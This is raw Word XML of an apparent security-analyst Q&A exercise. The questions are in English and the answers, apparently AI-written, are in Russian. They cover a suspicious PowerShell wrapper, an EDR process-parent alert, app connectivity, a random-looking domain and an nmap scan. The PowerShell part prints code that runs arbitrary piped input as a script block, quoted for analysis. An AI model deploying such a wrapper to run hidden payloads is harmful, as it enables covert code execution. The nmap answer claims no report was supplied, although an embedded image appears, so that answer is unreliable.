        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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Set-Variable -Name json_raw -Value $split_parts[1]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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$exec_wrapper = [ScriptBlock]::Create($split_parts[0])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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333333"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;$exec_wrapper</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$split_parts[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">присваивается переменной json_raw, которая, вероятно, предназначена для хранения некоторой формы данных, возможно, в формате JSON.</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$split_parts[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">преобразуется в ScriptBlockобъект с помощью [ScriptBlock]::Create(), что позволяет его выполнить. Затем блок скрипта выполняется с помощью &amp;$exec_wrapper.</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Последствия для безопасности</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Динамическое выполнение : скрипт динамически создает и выполняет ScriptBlockиз входных данных. Это распространенная тактика, используемая злоумышленниками для сокрытия своих полезных нагрузок и выполнения вредоносного кода без его непосредственного внедрения в скрипт.</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Обработка полезной нагрузки : входные данные разделяются и обрабатываются, что указывает на то, что полезная нагрузка может быть доставлена ​​в определенном формате, потенциально подразумевающем сложное кодирование или структуры данных.</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Потенциальное вредоносное использование : Возможность выполнения динамически сконструированных ScriptBlocksиз входных данных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">это красный флаг. Эта техника часто используется в атаках для выполнения произвольного кода.</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Обнаружение и смягчение последствий</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Мониторинг и ведение журнала :</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Включить ведение журнала ScriptBlock : убедитесь, что ведение журнала PowerShell ScriptBlock включено для захвата содержимого динамически выполняемых блоков скриптов.</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Отслеживайте необычную активность : следите за необычным или неожиданным выполнением скриптов PowerShell, особенно тех, которые связаны с динамическим созданием и выполнением скриптов.</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Проверка входных данных :</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Проверка источников входных данных : убедитесь, что входные данные для скриптов поступают из надежных и проверенных источников, чтобы предотвратить внедрение вредоносного кода.</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Защита конечной точки :</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Используйте решения EDR : используйте решения по обнаружению и реагированию на конечные точки (EDR) для отслеживания и оповещения о подозрительной активности PowerShell и выполнении скриптов.</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Наименьшие привилегии :</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Ограничьте выполнение PowerShell : ограничьте использование PowerShell только авторизованными пользователями и примените принцип наименьших привилегий, чтобы снизить влияние потенциальных атак.</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Краткое содержание</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Предоставленный скрипт PowerShell используется для выполнения полезной нагрузки путем динамического создания и запуска ScriptBlock. Он включает в себя разделение входных данных, проверку формата и последующее выполнение блока скрипта. Из-за своей способности выполнять произвольный код этот скрипт часто ассоциируется с потенциально вредоносными действиями. Реализация надежных методов мониторинга, ведения журнала и обеспечения безопасности имеет решающее значение для обнаружения и устранения любых угроз, создаваемых такими скриптами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">_____________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>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hidden in this code? Is it suspicious? </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Да, предоставленный фрагмент кода PowerShell действительно подозрителен и потенциально вредоносен. Вот подробный анализ того, почему это вызывает беспокойство:</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кода и потенциальные угрозы</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Изменение кодовой страницы</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powershell</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&amp;chcp.com 65001 &gt; $null</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Назначение : Устанавливает кодовую страницу UTF-8, что часто делается для корректной обработки закодированных данных.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аспект : Изменение кодовой страницы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">—</w:t>
      </w:r>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это метод, который иногда используется злоумышленниками для обеспечения правильной интерпретации полезной нагрузки, особенно если она включает специальные символы или данные, не входящие в ASCII.</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Чтение и обработка входных данных</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powershell</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$exec_wrapper_str = $input | Out-String</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Назначение : Преобразует входные данные в строковый формат.</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аспект : Это указывает на то, что скрипт предназначен для обработки входных данных, которые могут представлять собой запутанную полезную нагрузку.</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Разделение входных данных</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powershell</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$split_parts = $exec_wrapper_str.Split(@("`0`0`0`0"), 2, [StringSplitOptions]::RemoveEmptyEntries)</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Назначение : попытка разделить входные данные на две части с помощью разделителя из четырех нулевых символов.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аспект : использование необычного разделителя и специфической логики разделения предполагает, что скрипт ожидает специально отформатированную полезную нагрузку, что является обычной практикой во вредоносных программах для отделения кода от данных.</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Проверка разделенных частей</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powershell</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(-not $split_parts.Length -eq 2) { throw "invalid payload"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Цель : Гарантирует, что в результате операции разделения получится ровно две части.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аспект : Этап проверки предназначен для обработки ожидаемых форматов ввода. Если формат неверен, это означает, что ввод может быть подделан или неправильно отформатирован, что может быть частью механизма самозащиты.</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Создание и выполнение ScriptBlock</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powershell</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Set-Variable -Name json_raw -Value $split_parts[1]</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$exec_wrapper = [ScriptBlock]::Create($split_parts[0])</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&amp;$exec_wrapper</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Цель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Вторая часть разделенных данных хранится в json_raw, которая, вероятно, используется для дополнительной обработки или в качестве полезной нагрузки.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Первая часть разделенных данных преобразуется в ScriptBlockи выполняется.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Подозрительный аспект :</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Динамическое выполнение кода : скрипт динамически создает и выполняет ScriptBlockиз входных данных. Это распространенная техника, используемая для выполнения произвольного или запутанного кода.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Обфускация : использование $split_parts[0]для создания и выполнения ScriptBlockпредполагает, что фактическая полезная нагрузка запутана или скрыта, что типично для вредоносных программ, чтобы избежать обнаружения.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Скрипт крайне подозрителен по следующим причинам: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Динамическое выполнение : динамически создает и выполняет PowerShell ScriptBlockиз входных данных, что является распространенной тактикой для выполнения скрытого или запутанного кода.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Обработка ввода : Скрипт обрабатывает и разделяет входные данные с использованием определенного разделителя, указывая, что полезная нагрузка должна соответствовать определенному формату. Это часто делается для того, чтобы скрыть истинную природу полезной нагрузки.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Обфускация : использование chcp, разбиения строк и динамического ScriptBlockсоздания предполагает, что скрипт предназначен для обхода обнаружения и выполнения потенциально вредоносного кода.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Рекомендуемые действия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Проанализируйте полезную нагрузку : если возможно, соберите и проанализируйте входные данные, обрабатываемые этим скриптом, чтобы понять фактическую выполняемую полезную нагрузку.</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Мониторинг выполнения : отслеживайте выполнение скриптов PowerShell на конечных точках и обращайте внимание на любую необычную активность или динамическое выполнение кода.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Внедрите средства контроля безопасности : используйте инструменты защиты конечных точек, включите ведение журнала PowerShell (например, ScriptBlock Logging) и ограничьте политики выполнения PowerShell для снижения рисков.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Реагирование на инциденты : если этот сценарий обнаружен в вашей сети или системах, расценивайте его как инцидент безопасности и следуйте процедурам реагирования на инциденты, принятым в вашей организации.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 целом поведение этого скрипта соответствует распространенным приемам, используемым во вредоносных скриптах PowerShell, что делает его серьезной проблемой безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="12"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="12"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">_____________________________________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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observed an alert from EDR solution and have this info:</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c:\windows\system32\services.exe is launched by explorer.exe is it ok? If it is not what reason of it could be?</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Наблюдение за предупреждением от решения EDR (Endpoint Detection and Response), указывающим на то, что services.exe(законный системный процесс Windows) запускается explorer.exe(также законным процессом), является необычным и требует расследования. Ниже приведен подробный анализ того, является ли такое поведение типичным или подозрительным, а также потенциальных причин, стоящих за ним.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Нормальное поведение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Explorer.exe : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">это процесс проводника Windows, который отвечает за графический интерфейс пользователя и взаимодействие пользователя с файловой системой.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Services.exe : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Это критический системный процесс Windows, который управляет и контролирует службы Windows. Обычно он запускается системой во время загрузки и должен работать как системный процесс.</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Обычно services.exeне запускается напрямую explorer.exe. Обычно запускается процессами инициализации системы и работает как системная служба.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Подозрительное поведение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Необычная связь родитель-потомок : Если services.exeзапускается explorer.exe, это ненормальная связь родитель-потомок. В стандартной среде Windows services.exeобычно не запускается explorer.exe, и это отклонение от нормального поведения может указывать на потенциальную вредоносную активность.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Возможный эксплойт или вредоносное ПО : вредоносное ПО или продвинутые злоумышленники могут использовать легитимные процессы, чтобы избежать обнаружения. Например, они могут использовать уязвимость explorer.exeдля запуска services.exeили других процессов, чтобы обойти средства управления безопасностью или скрыть свою активность.</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Возможные причины оповещения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Активность вредоносного ПО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Процесс внедрения : вредоносное ПО может внедриться explorer.exeи начать services.exeскрывать свою деятельность. Это может быть частью техники, позволяющей избежать обнаружения или повысить привилегии.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Горизонтальное перемещение : злоумышленники могут использовать этот метод для выполнения команд или полезных нагрузок с помощью процесса, который кажется законным, что позволяет избежать немедленных подозрений.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Скомпрометированная система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Руткит или бэкдор : взломанная система может иметь руткит или бэкдор, который манипулирует выполнением процесса для выполнения вредоносных действий, пытаясь при этом оставаться скрытым.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Неправильная конфигурация или проблемы с программным обеспечением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Системные ошибки : хотя это и менее вероятно, неправильные конфигурации или проблемы с программным обеспечением могут вызвать неожиданное поведение процесса. Это следует исследовать, чтобы исключить системные или прикладные ошибки.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Шаги по расследованию</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Проверить процесс</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дерево процессов : изучите дерево процессов, чтобы понять, как services.exeбыл запущен explorer.exe. Используйте такие инструменты, как Process Explorer или Task Manager, для просмотра родительско-дочерних связей.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временные метки и журналы : просмотрите временные метки и журналы событий, чтобы определить, когда был запущен процесс и были ли какие-либо необычные действия или изменения в конфигурации системы.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Анализ исполняемых файлов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целостность файла : проверьте целостность services.exeи explorer.exeиспользуйте контрольные суммы (MD5/SHA256) по отношению к известным хорошим копиям. Убедитесь, что эти файлы не подделаны или не заменены вредоносными версиями.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Сканирование на наличие вредоносного ПО : используйте антивирусные или антивредоносные инструменты для сканирования системы на наличие потенциальных заражений.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Просмотреть последние изменения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Изменения в системе : найдите недавние изменения в системе, которые могли повлиять на выполнение процесса, например обновления, установки или изменения конфигурации.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Сетевая активность : отслеживайте сетевую активность, чтобы выявить необычные соединения или передачи данных, связанные с процессами.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известных индикаторов</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Аналитика угроз : просмотрите поведение и любые связанные с ним индикаторы компрометации (IoC) в базах данных аналитики угроз, чтобы узнать, были ли подобные действия зарегистрированы как вредоносные.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Реализовать меры реагирования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Сдерживание и искоренение : если вредоносная активность подтверждена, изолируйте затронутую систему, сдержите угрозу и следуйте процедурам реагирования на инциденты, чтобы искоренить угрозу и восстановить нормальную работу.</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Оповещение, указывающее, что services.exeзапущено, explorer.exeявляется подозрительным и должно быть расследовано. Хотя могут быть безобидные причины для необычных взаимосвязей процессов, такое поведение часто связано с продвинутыми угрозами или вредоносными действиями. Всесторонний анализ и реагирование необходимы для определения законности поведения и снижения потенциальных рисков.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5"/>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installed an application on your PC and the application cannot connect to the Internet. There are no antivirus warnings and you can browse the Internet. What is the most likely cause of the problem?</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Если вы установили приложение на свой ПК, и оно не может подключиться к Интернету, при этом вы можете нормально пользоваться Интернетом и антивирус не выдает никаких предупреждений, вот наиболее вероятные причины проблемы:</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Конфигурация брандмауэра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Заблокировано брандмауэром: приложение может быть заблокировано вашим брандмауэром. Пока ваш обычный просмотр Интернета работает, брандмауэр может иметь правила, которые специально блокируют сетевой трафик нового приложения.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настройки брандмауэра: Откройте настройки брандмауэра (брандмауэр Windows или любой сторонний брандмауэр) и убедитесь, что приложение не блокируется. Добавьте исключение или правило, чтобы разрешить приложению взаимодействовать через брандмауэр.</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Настройки прокси-сервера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Неправильная конфигурация прокси-сервера: если в вашей сети используется прокси-сервер, приложение может быть не настроено на использование правильных параметров прокси-сервера или не поддерживать прокси-серверы.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настройки прокси-сервера: убедитесь, что приложение правильно настроено с настройками сетевого прокси-сервера. Проверьте как общесистемные настройки прокси-сервера, так и любые настройки прокси-сервера, специфичные для приложения.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Проблемы, связанные с конкретным приложением</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Неправильно настроенное приложение: приложение может иметь собственные настройки или требования к сетевому подключению, которые настроены неправильно.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настройки приложения: проверьте настройки сети или Интернета приложения. Убедитесь, что оно настроено правильно, и ознакомьтесь с документацией приложения для получения информации о конкретных требованиях или настройках.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Конфигурация сети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с локальной сетью: могут возникнуть сетевые проблемы, характерные для вашей локальной среды, влияющие только на определенные приложения, например, проблемы с конфигурацией DNS или IP.</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конфигурацию сети: проверьте настройки локальной сети, включая конфигурацию DNS и IP. Используйте диагностические инструменты ( ping, tracert, и т. д.) для проверки подключения.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Конфигурация программного обеспечения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Ограничения программного обеспечения безопасности: даже при отсутствии явных предупреждений программное обеспечение безопасности может ограничивать сетевой доступ определенных приложений.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Обзор программного обеспечения безопасности: Проверьте журналы или настройки в программном обеспечении безопасности (антивирус, защита конечных точек), чтобы увидеть, блокирует ли оно приложение. Временно отключите его в качестве теста, чтобы посмотреть, решит ли это проблему.</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Совместимость приложений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совместимости: приложение может иметь проблемы совместимости с вашей операционной системой или сетевой средой.</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наличие обновлений: убедитесь, что приложение и ваша операционная система обновлены. Проверьте наличие проблем совместимости или исправлений для приложения.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7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Сетевые политики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Ограничения управляемой сети: если вы находитесь в управляемой или корпоративной сети, сетевые политики или списки контроля доступа могут ограничивать подключение приложения.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Решение:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>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Обратитесь к администратору сети: если вы находитесь в управляемой сети, проконсультируйтесь с администратором сети, чтобы проверить, существуют ли какие-либо политики или ограничения, влияющие на приложение.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Наиболее вероятной причиной того, что приложение не может подключиться к Интернету, несмотря на вашу способность нормально просматривать веб-страницы, является неправильная конфигурация в настройках брандмауэра или прокси-сервера. Важно систематически проверять и корректировать эти настройки, чтобы решить проблему с подключением.</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7"/>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can you say about this URL “</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com</w:t>
        </w:r>
      </w:hyperlink>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URL-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">адрес </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId16">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
            <w:color w:val="00B050"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comдемонстрирует</w:t>
        </w:r>
      </w:hyperlink>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несколько характеристик, которые могут указывать на то, что он является подозрительным или потенциально вредоносным. Вот подробное описание того, что можно предположить об этом URL-адресе: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Необычная структура доменного имени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Случайные символы: Доменное имя выглядит как строка случайных символов и не напоминает никаких узнаваемых или значимых слов. Такая случайность часто указывает на домены, используемые для вредоносной деятельности, такой как фишинг или распространение вредоносного ПО.</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Длинный и сложный: домен необычно длинный и сложный, что является общей чертой доменов, используемых для избежания обнаружения системами безопасности и для избежания легкого запоминания или блокировки.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Недостаточная узнаваемость бренда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Никакого знакомства: Домен не содержит никаких узнаваемых торговых марок или общих ключевых слов, что может указывать на то, что он не связан с законными предприятиями или организациями. Он часто используется на временных или одноразовых веб-сайтах.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Возможность злонамеренного использования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Распространено во вредоносной деятельности: Домены со случайными или запутанными именами часто используются в различных киберугрозах, включая:</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Фишинг: создание обманных сайтов, которые выглядят как настоящие, но предназначены для кражи конфиденциальной информации.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Распространение вредоносного ПО: размещение вредоносных файлов или полезных данных.</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Серверы управления и контроля (C2): для удаленного управления скомпрометированными системами.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Эксплуатация: как часть наборов эксплойтов или других форм инфраструктуры атак.</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Поиск DNS и WHOIS</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записей DNS: выполните поиск DNS, чтобы проверить, есть ли в домене подозрительные записи или разрешаются ли они в IP-адреса, связанные с известными вредоносными действиями.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Информация WHOIS: Проверьте информацию WHOIS для домена. Часто домены, используемые в вредоносных целях, регистрируются службами защиты конфиденциальности или имеют запутанные регистрационные данные.</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Анализ репутации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Базы данных безопасности: используйте службы или базы данных по анализу угроз безопасности (например, VirusTotal, Web of Trust или аналогичные) для проверки репутации домена. Многие службы собирают отчеты о вредоносной активности, связанной с определенными доменами.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Исторические данные: выясните, был ли домен отмечен в прошлых инцидентах или оповещениях безопасности.</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Проверка веб-контента</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контента: если он безопасен и допустим, проверьте контент, размещенный на домене, чтобы убедиться, что он соответствует законной деятельности или содержит признаки вредоносного контента (например, фишинговые формы, загрузки вредоносного ПО или необычные скрипты).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>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Заключение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Учитывая характеристики URL </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId17">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
            <w:color w:val="00B050"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">он, скорее всего, будет подозрительным. Его случайный и длинный характер предполагает, что он может использоваться в вредоносных целях. Рекомендуется обращаться с такими URL с осторожностью и избегать взаимодействия с ними. Проведение дальнейшего расследования с использованием DNS, WHOIS и проверок репутации предоставит дополнительную информацию о легитимности домена и потенциальном уровне угрозы.</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9"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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can you say about this nmap scan report? Are there any security issues in this report? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="8422" w:dyaOrig="5102">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000006" style="width:421.100000pt;height:255.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оценить, есть ли какие-либо проблемы безопасности в отчете сканирования Nmap, вам необходимо просмотреть детали отчета, такие как открытые порты, версии служб и потенциальные уязвимости. Поскольку вы не предоставили конкретный отчет сканирования Nmap, я обрисую ключевые аспекты типичного отчета сканирования Nmap и общие проблемы безопасности, которые могут присутствовать.</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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Открытые порты и сервисы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Открытые порты: отчет о сканировании будет содержать список открытых портов на целевой системе. Открытые порты могут быть точками входа для злоумышленников.</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Службы: службы, работающие на этих портах, и их версии часто идентифицируются. Знание версий служб может помочь в определении наличия известных уязвимостей.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Ненужные открытые порты: Порты, которые открыты, но не требуются для функциональности системы, могут представлять потенциальные риски безопасности. Например, открытый порт для службы, которая не должна быть доступна общественности, может быть использован.</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Устаревшие службы: службы, работающие на устаревших версиях, могут иметь известные уязвимости, которые можно эксплуатировать. Например, старые версии программного обеспечения могут иметь уязвимости безопасности, которые были исправлены в новых версиях.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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Определение сервиса и версии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служб: Nmap может определять службы, работающие на открытых портах, и их версии.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Информация о версии: Точная информация о версии сервиса позволяет проводить конкретные оценки уязвимостей.</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Известные уязвимости: Если сканирование выявляет определенную версию сервиса с известными уязвимостями (например, старую версию Apache или FTP), это указывает на потенциальную угрозу безопасности. Злоумышленники часто используют известные уязвимости в устаревшем программном обеспечении.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Конфигурации по умолчанию: службы, работающие с конфигурациями по умолчанию, могут быть небезопасными. Например, пароли по умолчанию или настройки по умолчанию могут быть использованы, если их не изменить или не настроить должным образом.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3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Определение операционной системы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Обнаружение ОС: Nmap иногда может определять операционную систему целевой машины, что может помочь понять, какие еще службы и уязвимости могут присутствовать.</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Уязвимости, специфичные для ОС: Знание версии и типа ОС помогает выявить уязвимости, специфичные для ОС. Например, в старых версиях Windows могут быть уязвимости, отсутствующие в более новых версиях или исправленных системах.</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4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Захват баннера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Захват баннеров: Nmap может захватывать баннеры от сервисов для сбора дополнительной информации о программном обеспечении и его версии.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Раскрытие конфиденциальной информации: Баннеры иногда раскрывают конфиденциальную информацию о системе или услуге. Эта информация может быть использована злоумышленниками для адаптации своих атак.</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5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Необычные или неожиданные услуги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Неожиданные службы: Иногда в системе обнаруживаются запущенные неожиданные службы или приложения.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Ненужные службы: запуск служб, которые не нужны для функционирования системы, может представлять угрозу безопасности. Эти службы могут быть не защищены или не контролироваться должным образом.</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Потенциальные бэкдоры: Неизвестные или необычные сервисы могут быть потенциальными бэкдорами или индикаторами компрометации. Злоумышленник мог установить дополнительное программное обеспечение для получения несанкционированного доступа.</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6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
